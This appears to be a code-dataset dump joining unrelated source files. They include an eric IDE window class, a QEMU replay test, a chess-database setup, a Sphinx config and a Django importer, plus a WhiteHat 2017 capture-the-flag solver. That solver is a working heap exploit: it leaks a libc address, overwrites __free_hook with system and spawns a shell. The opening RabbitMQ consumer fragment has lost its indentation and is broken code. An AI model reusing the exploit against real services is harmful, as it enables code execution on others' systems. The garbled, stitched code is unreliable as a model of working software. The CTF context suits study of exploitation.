newContact = newContact.get()
else:
newContact = FourSquareContact(foursquare_resource_locator=data["foursquare_resource_locator"])
try:
newContact.save(force_insert=True)
            except Exception as e:
                """
                Collide, should not happen!
                """
                sys.stderr.write("Collision occurred: " + str(e))
psql_db.rollback()
updateFourSquareContact(data)
elif data["protocol"] == "google":
newContact = GoogleContact.select().where(GoogleContact.google_resource_locator == data["google_resource_locator"])
if newContact.exists():
newContact = newContact.get()
else:
newContact = GoogleContact(google_resource_locator=data["google_resource_locator"])
try:
newContact.save(force_insert=True)
            except Exception as e:
                """
                Collide, should not happen!
                """
                sys.stderr.write("Collision occurred: " + str(e))
psql_db.rollback()
updateGoogleContact(data)
except Exception as e:
sys.stderr.write(str(e) + "Unable to parse body: \n" + body + "\n")
traceback.print_exc()
sys.stderr.flush()
finally:
ingress_channel.basic_ack(delivery_tag = method.delivery_tag)
def admin_callback(ch, method, properties, body):
try:
data = json.loads(body)
return
except Exception as e:
sys.stderr.write(str(e) + "Unable to fetch: \n" + body + "\n")
traceback.print_exc()
try:
psql_db.rollback()
except:
psql_db.close()
psql_db.connect()
sys.stderr.flush()
finally:
ingress_channel.basic_ack(delivery_tag = method.delivery_tag)
ingress_channel.basic_qos(prefetch_count=1)
ingress_channel.basic_consume(callback, queue='store')
ingress_channel.basic_consume(admin_callback, queue=admin_queue.method.queue)
ingress_channel.start_consuming()
| mit | -2,677,906,427,138,695,700 | 34.59893 | 207 | 0.625507 | false |
davy39/eric | E5Gui/E5MainWindow.py | 1 | 2118 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 - 2014 Detlev Offenbach <[email protected]>
#
"""
Module implementing a main window class with styling support.
"""
from __future__ import unicode_literals
from PyQt5.QtWidgets import QMainWindow, QStyleFactory, QApplication
from .E5Application import e5App
from . import E5MessageBox
class E5MainWindow(QMainWindow):
"""
Class implementing a main window with styling support.
"""
def __init__(self, parent=None):
"""
Constructor
@param parent reference to the parent widget (QWidget)
"""
super(E5MainWindow, self).__init__(parent)
self.defaultStyleName = QApplication.style().objectName()
def setStyle(self, styleName, styleSheetFile):
"""
Public method to set the style of the interface.
@param styleName name of the style to set (string)
@param styleSheetFile name of a style sheet file to read to overwrite
defaults of the given style (string)
"""
# step 1: set the style
style = None
if styleName != "System" and styleName in QStyleFactory.keys():
style = QStyleFactory.create(styleName)
if style is None:
style = QStyleFactory.create(self.defaultStyleName)
if style is not None:
QApplication.setStyle(style)
# step 2: set a style sheet
if styleSheetFile:
try:
f = open(styleSheetFile, "r", encoding="utf-8")
styleSheet = f.read()
f.close()
except (IOError, OSError) as msg:
E5MessageBox.warning(
self,
self.tr("Loading Style Sheet"),
self.tr(
"""<p>The Qt Style Sheet file <b>{0}</b> could"""
""" not be read.<br>Reason: {1}</p>""")
.format(styleSheetFile, str(msg)))
return
else:
styleSheet = ""
e5App().setStyleSheet(styleSheet)
| gpl-3.0 | 6,563,336,699,552,753,000 | 30.61194 | 77 | 0.557129 | false |
Qwaz/solved-hacking-problem | WhiteHat/2017 Quals/bank/solver.py | 1 | 1948 | from pwn import *
from time import sleep
def wait_menu():
p.recvuntil('---> ')
def show_my_info():
wait_menu()
p.sendline('1')
def transfer(bank, amount):
wait_menu()
p.sendline('2')
wait_menu()
p.sendline(str(bank))
wait_menu()
p.sendline(str(amount))
def deposit(bank, amount):
wait_menu()
p.sendline('3')
wait_menu()
p.sendline(str(bank))
wait_menu()
p.sendline(str(amount))
def withdraw(bank, amount):
wait_menu()
p.sendline('4')
wait_menu()
p.sendline(str(bank))
wait_menu()
p.sendline(str(amount))
def buy_item(item):
wait_menu()
p.sendline('5')
wait_menu()
p.sendline(str(item))
def change_item_name(index, name):
wait_menu()
p.sendline('6')
wait_menu()
p.sendline(str(index))
wait_menu()
p.sendline(name)
MALLOC_OFFSET = 0x84130
SYSTEM_OFFSET = 0x45390
FREE_HOOK = 0x3c67a8
p = process('./bank', raw=False)
# p = remote('challenges.whitehatcontest.kr', 9999)
deposit(1, 800)
for i in range(5):
transfer(1, 0)
withdraw(1, 800)
withdraw(1, 800)
withdraw(1, 1000000000000000000*5)
sleep(3)
buy_item(1)
change_item_name(0, '/bin/sh'.ljust(32, '\x00'))
for i in range(15):
buy_item(1)
change_item_name(i+1, 'A'*32)
buy_item(1)
change_item_name(16, p64(0x602fd8))
wait_menu()
p.sendline(str(1))
p.recvuntil('* Account Number : ')
malloc_leak = u64(p.recvline().strip().ljust(8, '\x00'))
log.success('malloc: 0x%x' % malloc_leak)
libc_base = malloc_leak - MALLOC_OFFSET
log.success('libc: 0x%x' % libc_base)
change_item_name(16, p64(0x603180))
wait_menu()
p.sendline('5')
wait_menu()
p.sendline('\xff')
wait_menu()
p.sendline(str(1))
p.sendline(p64(0))
change_item_name(16, p64(libc_base + FREE_HOOK))
wait_menu()
p.sendline('5')
wait_menu()
p.sendline('\xff')
wait_menu()
p.sendline(str(1))
p.sendline(p64(libc_base + SYSTEM_OFFSET))
wait_menu()
p.sendline('7')
p.interactive()
| gpl-2.0 | -6,671,868,945,516,682,000 | 15.649573 | 56 | 0.632444 | false |
dslutz/qemu | tests/acceptance/replay_kernel.py | 3 | 12508 | # Record/replay test that boots a Linux kernel
#
# Copyright (c) 2020 ISP RAS
#
# Author:
# Pavel Dovgalyuk <[email protected]>
#
# This work is licensed under the terms of the GNU GPL, version 2 or
# later. See the COPYING file in the top-level directory.
import os
import logging
import time
from avocado import skipIf
from avocado_qemu import wait_for_console_pattern
from avocado.utils import archive
from avocado.utils import process
from boot_linux_console import LinuxKernelTest
class ReplayKernel(LinuxKernelTest):
"""
Boots a Linux kernel in record mode and checks that the console
is operational and the kernel command line is properly passed
from QEMU to the kernel.
    Then replays the same scenario and verifies that QEMU correctly
terminates.
"""
timeout = 90
KERNEL_COMMON_COMMAND_LINE = 'printk.time=1 panic=-1 '
def run_vm(self, kernel_path, kernel_command_line, console_pattern,
record, shift, args, replay_path):
logger = logging.getLogger('replay')
start_time = time.time()
vm = self.get_vm()
vm.set_console()
if record:
logger.info('recording the execution...')
mode = 'record'
else:
logger.info('replaying the execution...')
mode = 'replay'
vm.add_args('-icount', 'shift=%s,rr=%s,rrfile=%s' %
(shift, mode, replay_path),
'-kernel', kernel_path,
'-append', kernel_command_line,
'-net', 'none',
'-no-reboot')
if args:
vm.add_args(*args)
vm.launch()
self.wait_for_console_pattern(console_pattern, vm)
if record:
vm.shutdown()
logger.info('finished the recording with log size %s bytes'
% os.path.getsize(replay_path))
else:
vm.wait()
logger.info('successfully finished the replay')
elapsed = time.time() - start_time
logger.info('elapsed time %.2f sec' % elapsed)
return elapsed
def run_rr(self, kernel_path, kernel_command_line, console_pattern,
shift=7, args=None):
replay_path = os.path.join(self.workdir, 'replay.bin')
t1 = self.run_vm(kernel_path, kernel_command_line, console_pattern,
True, shift, args, replay_path)
t2 = self.run_vm(kernel_path, kernel_command_line, console_pattern,
False, shift, args, replay_path)
logger = logging.getLogger('replay')
logger.info('replay overhead {:.2%}'.format(t2 / t1 - 1))
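    # Illustrative sketch (not part of the original test): for the x86_64 case
    # below, the record phase assembled by run_vm() corresponds roughly to
    #
    #   qemu-system-x86_64 -icount shift=5,rr=record,rrfile=replay.bin \
    #       -kernel vmlinuz -append 'printk.time=1 panic=-1 console=ttyS0' \
    #       -net none -no-reboot
    #
    # and the replay phase reruns the same command with rr=replay; the binary
    # name and file paths here are assumptions for illustration only.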
@skipIf(os.getenv('GITLAB_CI'), 'Running on GitLab')
def test_x86_64_pc(self):
"""
:avocado: tags=arch:x86_64
:avocado: tags=machine:pc
"""
kernel_url = ('https://archives.fedoraproject.org/pub/archive/fedora'
'/linux/releases/29/Everything/x86_64/os/images/pxeboot'
'/vmlinuz')
kernel_hash = '23bebd2680757891cf7adedb033532163a792495'
kernel_path = self.fetch_asset(kernel_url, asset_hash=kernel_hash)
kernel_command_line = self.KERNEL_COMMON_COMMAND_LINE + 'console=ttyS0'
console_pattern = 'VFS: Cannot open root device'
self.run_rr(kernel_path, kernel_command_line, console_pattern, shift=5)
def test_aarch64_virt(self):
"""
:avocado: tags=arch:aarch64
:avocado: tags=machine:virt
:avocado: tags=cpu:cortex-a53
"""
kernel_url = ('https://archives.fedoraproject.org/pub/archive/fedora'
'/linux/releases/29/Everything/aarch64/os/images/pxeboot'
'/vmlinuz')
kernel_hash = '8c73e469fc6ea06a58dc83a628fc695b693b8493'
kernel_path = self.fetch_asset(kernel_url, asset_hash=kernel_hash)
kernel_command_line = (self.KERNEL_COMMON_COMMAND_LINE +
'console=ttyAMA0')
console_pattern = 'VFS: Cannot open root device'
self.run_rr(kernel_path, kernel_command_line, console_pattern,
args=('-cpu', 'cortex-a53'))
def test_arm_virt(self):
"""
:avocado: tags=arch:arm
:avocado: tags=machine:virt
"""
kernel_url = ('https://archives.fedoraproject.org/pub/archive/fedora'
'/linux/releases/29/Everything/armhfp/os/images/pxeboot'
'/vmlinuz')
kernel_hash = 'e9826d741b4fb04cadba8d4824d1ed3b7fb8b4d4'
kernel_path = self.fetch_asset(kernel_url, asset_hash=kernel_hash)
kernel_command_line = (self.KERNEL_COMMON_COMMAND_LINE +
'console=ttyAMA0')
console_pattern = 'VFS: Cannot open root device'
self.run_rr(kernel_path, kernel_command_line, console_pattern, shift=1)
@skipIf(os.getenv('GITLAB_CI'), 'Running on GitLab')
def test_arm_cubieboard_initrd(self):
"""
:avocado: tags=arch:arm
:avocado: tags=machine:cubieboard
"""
deb_url = ('https://apt.armbian.com/pool/main/l/'
'linux-4.20.7-sunxi/linux-image-dev-sunxi_5.75_armhf.deb')
deb_hash = '1334c29c44d984ffa05ed10de8c3361f33d78315'
deb_path = self.fetch_asset(deb_url, asset_hash=deb_hash)
kernel_path = self.extract_from_deb(deb_path,
'/boot/vmlinuz-4.20.7-sunxi')
dtb_path = '/usr/lib/linux-image-dev-sunxi/sun4i-a10-cubieboard.dtb'
dtb_path = self.extract_from_deb(deb_path, dtb_path)
initrd_url = ('https://github.com/groeck/linux-build-test/raw/'
'2eb0a73b5d5a28df3170c546ddaaa9757e1e0848/rootfs/'
'arm/rootfs-armv5.cpio.gz')
initrd_hash = '2b50f1873e113523967806f4da2afe385462ff9b'
initrd_path_gz = self.fetch_asset(initrd_url, asset_hash=initrd_hash)
initrd_path = os.path.join(self.workdir, 'rootfs.cpio')
archive.gzip_uncompress(initrd_path_gz, initrd_path)
kernel_command_line = (self.KERNEL_COMMON_COMMAND_LINE +
'console=ttyS0,115200 '
'usbcore.nousb '
'panic=-1 noreboot')
console_pattern = 'Boot successful.'
self.run_rr(kernel_path, kernel_command_line, console_pattern, shift=1,
args=('-dtb', dtb_path,
'-initrd', initrd_path,
'-no-reboot'))
def test_ppc64_pseries(self):
"""
:avocado: tags=arch:ppc64
:avocado: tags=machine:pseries
"""
kernel_url = ('https://archives.fedoraproject.org/pub/archive'
'/fedora-secondary/releases/29/Everything/ppc64le/os'
'/ppc/ppc64/vmlinuz')
kernel_hash = '3fe04abfc852b66653b8c3c897a59a689270bc77'
kernel_path = self.fetch_asset(kernel_url, asset_hash=kernel_hash)
kernel_command_line = self.KERNEL_COMMON_COMMAND_LINE + 'console=hvc0'
# icount is not good enough for PPC64 for complete boot yet
console_pattern = 'Kernel command line: %s' % kernel_command_line
self.run_rr(kernel_path, kernel_command_line, console_pattern)
def test_m68k_q800(self):
"""
:avocado: tags=arch:m68k
:avocado: tags=machine:q800
"""
deb_url = ('https://snapshot.debian.org/archive/debian-ports'
'/20191021T083923Z/pool-m68k/main'
'/l/linux/kernel-image-5.3.0-1-m68k-di_5.3.7-1_m68k.udeb')
deb_hash = '044954bb9be4160a3ce81f8bc1b5e856b75cccd1'
deb_path = self.fetch_asset(deb_url, asset_hash=deb_hash)
kernel_path = self.extract_from_deb(deb_path,
'/boot/vmlinux-5.3.0-1-m68k')
kernel_command_line = (self.KERNEL_COMMON_COMMAND_LINE +
'console=ttyS0 vga=off')
console_pattern = 'No filesystem could mount root'
self.run_rr(kernel_path, kernel_command_line, console_pattern)
def do_test_advcal_2018(self, file_path, kernel_name, args=None):
archive.extract(file_path, self.workdir)
for entry in os.scandir(self.workdir):
if entry.name.startswith('day') and entry.is_dir():
kernel_path = os.path.join(entry.path, kernel_name)
break
kernel_command_line = ''
console_pattern = 'QEMU advent calendar'
self.run_rr(kernel_path, kernel_command_line, console_pattern,
args=args)
def test_arm_vexpressa9(self):
"""
:avocado: tags=arch:arm
:avocado: tags=machine:vexpress-a9
"""
tar_hash = '32b7677ce8b6f1471fb0059865f451169934245b'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day16.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
dtb_path = self.workdir + '/day16/vexpress-v2p-ca9.dtb'
self.do_test_advcal_2018(file_path, 'winter.zImage',
args=('-dtb', dtb_path))
def test_m68k_mcf5208evb(self):
"""
:avocado: tags=arch:m68k
:avocado: tags=machine:mcf5208evb
"""
tar_hash = 'ac688fd00561a2b6ce1359f9ff6aa2b98c9a570c'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day07.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'sanity-clause.elf')
def test_microblaze_s3adsp1800(self):
"""
:avocado: tags=arch:microblaze
:avocado: tags=machine:petalogix-s3adsp1800
"""
tar_hash = '08bf3e3bfb6b6c7ce1e54ab65d54e189f2caf13f'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day17.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'ballerina.bin')
def test_ppc64_e500(self):
"""
:avocado: tags=arch:ppc64
:avocado: tags=machine:ppce500
:avocado: tags=cpu:e5500
"""
tar_hash = '6951d86d644b302898da2fd701739c9406527fe1'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day19.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'uImage', ('-cpu', 'e5500'))
def test_ppc_g3beige(self):
"""
:avocado: tags=arch:ppc
:avocado: tags=machine:g3beige
"""
tar_hash = 'e0b872a5eb8fdc5bed19bd43ffe863900ebcedfc'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day15.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'invaders.elf',
args=('-M', 'graphics=off'))
def test_ppc_mac99(self):
"""
:avocado: tags=arch:ppc
:avocado: tags=machine:mac99
"""
tar_hash = 'e0b872a5eb8fdc5bed19bd43ffe863900ebcedfc'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day15.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'invaders.elf',
args=('-M', 'graphics=off'))
def test_sparc_ss20(self):
"""
:avocado: tags=arch:sparc
:avocado: tags=machine:SS-20
"""
tar_hash = 'b18550d5d61c7615d989a06edace051017726a9f'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day11.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'zImage.elf')
def test_xtensa_lx60(self):
"""
:avocado: tags=arch:xtensa
:avocado: tags=machine:lx60
:avocado: tags=cpu:dc233c
"""
tar_hash = '49e88d9933742f0164b60839886c9739cb7a0d34'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day02.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'santas-sleigh-ride.elf',
args=('-cpu', 'dc233c'))
| gpl-2.0 | 1,474,124,330,567,337,700 | 40.554817 | 79 | 0.584346 | false |
jhartz/masterchess | MasterChess/__init__.py | 1 | 2533 | """
MasterChess library
Copyright (C) 2013 Jake Hartz
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Usage:
Import MasterChess and call open_database to get a mc ("MasterChess") instance
Requires Python >= 2.5 and < 3
"""
"""
"outcome" values for matches:
0 - white win
1 - black win
2 - stalemate
3 - draw
"""
import sys, sqlite3
from mc import mc
__author__ = "Jake Hartz"
__copyright__ = "Copyright (C) 2013 Jake Hartz"
__license__ = "GPL"
__version__ = "1.0"
def open_database(path):
"""Check and set up database based on "path", then return an mc ("MasterChess") instance."""
try:
conn = sqlite3.connect(path)
if conn:
players = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='players';")
if len(players.fetchall()) == 0:
conn.execute("CREATE TABLE 'players' (id INTEGER PRIMARY KEY, deleted INTEGER, first_name TEXT, last_name TEXT, grade INTEGER);")
matches = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='matches';")
if len(matches.fetchall()) == 0:
conn.execute("CREATE TABLE 'matches' (id INTEGER PRIMARY KEY, enabled INTEGER, timestamp INTEGER, white_player INTEGER, black_player INTEGER, outcome INTEGER);")
prefs = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='prefs';")
if len(prefs.fetchall()) == 0:
conn.execute("CREATE TABLE 'prefs' (name TEXT UNIQUE NOT NULL, value TEXT);")
conn.commit()
conn.close()
mc_instance = mc(path)
if mc_instance:
return mc_instance
else:
print >> sys.stderr, "open_database WARNING:", "No mc; received:", mc_instance
except:
exc_type, exc_value = sys.exc_info()[:2]
print >> sys.stderr, "open_database ERROR:", exc_type, exc_value | gpl-3.0 | -2,665,703,317,323,300,000 | 35.2 | 177 | 0.647059 | false |
mislavcimpersak/django-real-content | docs/conf.py | 1 | 9298 | # -*- coding: utf-8 -*-
#
# django-real-content documentation build configuration file, created by
# sphinx-quickstart on Sun Jun 14 13:31:41 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-real-content'
copyright = u'2015, Mislav Cimperšak'
author = u'Mislav Cimperšak'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.4'
# The full version, including alpha/beta/rc tags.
release = '0.1.4'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-real-contentdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'django-real-content.tex', u'django-real-content Documentation',
u'Mislav Cimperšak', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'django-real-content', u'django-real-content Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'django-real-content', u'django-real-content Documentation',
author, 'django-real-content', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mit | 1,171,087,526,966,120,000 | 31.728873 | 79 | 0.709091 | false |
Ircam-Web/mezzanine-organization | organization/network/management/commands/import-ircam-project.py | 1 | 8883 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016-2017 Ircam
# Copyright (c) 2016-2017 Guillaume Pellerin
# Copyright (c) 2016-2017 Emilie Zawadzki
# This file is part of mezzanine-organization.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import csv
import re
import logging
import datetime
from optparse import make_option
import xlrd
from itertools import takewhile
from re import findall
import dateutil.parser
# from string import split
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
from django.db.models import Q
from organization.core.models import *
from organization.network.models import *
from organization.projects.models import *
class Logger:
def __init__(self, file):
self.logger = logging.getLogger('myapp')
self.hdlr = logging.FileHandler(file)
self.formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
self.hdlr.setFormatter(self.formatter)
self.logger.addHandler(self.hdlr)
self.logger.setLevel(logging.INFO)
def info(self, prefix, message):
self.logger.info(' ' + prefix + ' : ' + message)
def error(self, prefix, message):
self.logger.error(prefix + ' : ' + message)
def get_instance(model, field, value):
    instances = model.objects.filter(**{field: value})
    if instances:
        return instances[0]
    else:
        instance = model()
        setattr(instance, field, value)
        return instance
def format_message(project):
message = str(project.id) + " | "
message += project.title + " | "
message += project.external_id if project.external_id else "None"
return message
class IrcamXLS:
sheet_id = 0
project_table_1_first_row = 12
project_table_1_last_row = 25
project_table_2_first_row = 34
project_table_2_last_row = 90
nb_col_max = 9
nb_col_min = 0
avoid_col = 3
def __init__(self, file):
self.book = xlrd.open_workbook(file)
self.sheet = self.book.sheet_by_index(self.sheet_id)
class IrcamProjects(object):
def __init__(self, project_name):
print("project", project_name)
project, is_created = Project.objects.get_or_create(title=project_name)
self.project = project
self.is_created = is_created
if self.is_created:
self.project.title = project_name
def set_external_id(self, external_id):
if external_id and self.project.external_id is None:
if isinstance(external_id, float):
external_id = str(int(external_id))
external_id = re.sub(r'((\s)*(-)(\s)*)|(\s)', '-', external_id)
self.project.external_id = external_id
def set_call_project(self, call):
if call and self.project.call is None:
project_call, is_created = ProjectCall.objects.get_or_create(name__icontains=call)
if is_created:
project_call.name = call
project_call.save()
self.project.call = project_call
def set_date_from(self, date_from):
if date_from and self.project.date_from is None:
self.project.date_from = date_from
def set_date_to(self, date_to):
if date_to and self.project.date_to is None:
self.project.date_to = date_to
def set_lead_organization(self, lead_organization):
if lead_organization and self.project.lead_organization is None:
lo, is_created = Organization.objects.get_or_create(name=lead_organization)
self.project.lead_organization = lo
def set_referring_person(self, referring_person):
if referring_person and self.project.referring_person is None:
referring_person_list = re.split(r'\s*/\s*', referring_person, 1)
for rp in referring_person_list:
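                # Entries look like "J. Doe": match on last name plus the first-name initial.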
                rp_whole_name = re.split(r'\s+', rp, 1)
last_name = max(rp_whole_name, key=len)
initial_first_name = min(rp_whole_name, key=len)
initial_first_name = re.sub(r'\.', '', initial_first_name)
persons = Person.objects.filter(last_name__icontains=last_name)
for person in persons:
if person.first_name[0] == initial_first_name:
self.project.referring_person.add(person)
def set_teams(self, lead_teams):
if lead_teams and self.project.lead_team is None:
lead_teams_list = re.split(r'\s*,\s*', lead_teams, 1)
for lt in lead_teams_list:
t, is_created = Team.objects.get_or_create(code__icontains=lt)
if is_created:
t.title = lt
t.save()
self.project.teams.add(t)
def set_manager(self, manager):
if manager and self.project.manager is None :
            manager_whole_name = re.split(r'\s+', manager, 1)
last_name = max(manager_whole_name, key=len)
initial_first_name = min(manager_whole_name, key=len)
initial_first_name = re.sub(r'\.', '', initial_first_name)
persons = Person.objects.filter(last_name__icontains=last_name)
for person in persons:
if person.first_name[0] == initial_first_name:
self.project.manager.add(person)
def save_project(self):
self.project.save()
class Command(BaseCommand):
help = """Import Person data from IRCAM's legacy XLS management file.
python manage.py import-ircam-project -s /srv/backup/projects_rd_jan17.xlsx
"""
option_list = BaseCommand.option_list + (
make_option('-d', '--dry-run',
action='store_true',
dest='dry-run',
help='Do NOT write anything'),
make_option('-f', '--force',
action='store_true',
dest='force',
help='Force overwrite data'),
make_option('-s', '--source',
dest='source_file',
help='define the XLS source file'),
make_option('-l', '--log',
dest='log',
help='define log file'),
)
def handle(self, *args, **kwargs):
self.logger = Logger(kwargs.get('log'))
self.pattern = kwargs.get('pattern')
self.source_file = os.path.abspath(kwargs.get('source_file'))
self.dry_run = kwargs.get('dry-run')
self.force = kwargs.get('force')
xls = IrcamXLS(self.source_file)
# Table 1
for row_index in range(xls.project_table_1_first_row, xls.project_table_1_last_row):
ip = IrcamProjects(xls.sheet.cell_value(row_index, 0))
ip.set_external_id(xls.sheet.cell_value(row_index, 1))
ip.set_call_project(xls.sheet.cell_value(row_index, 2))
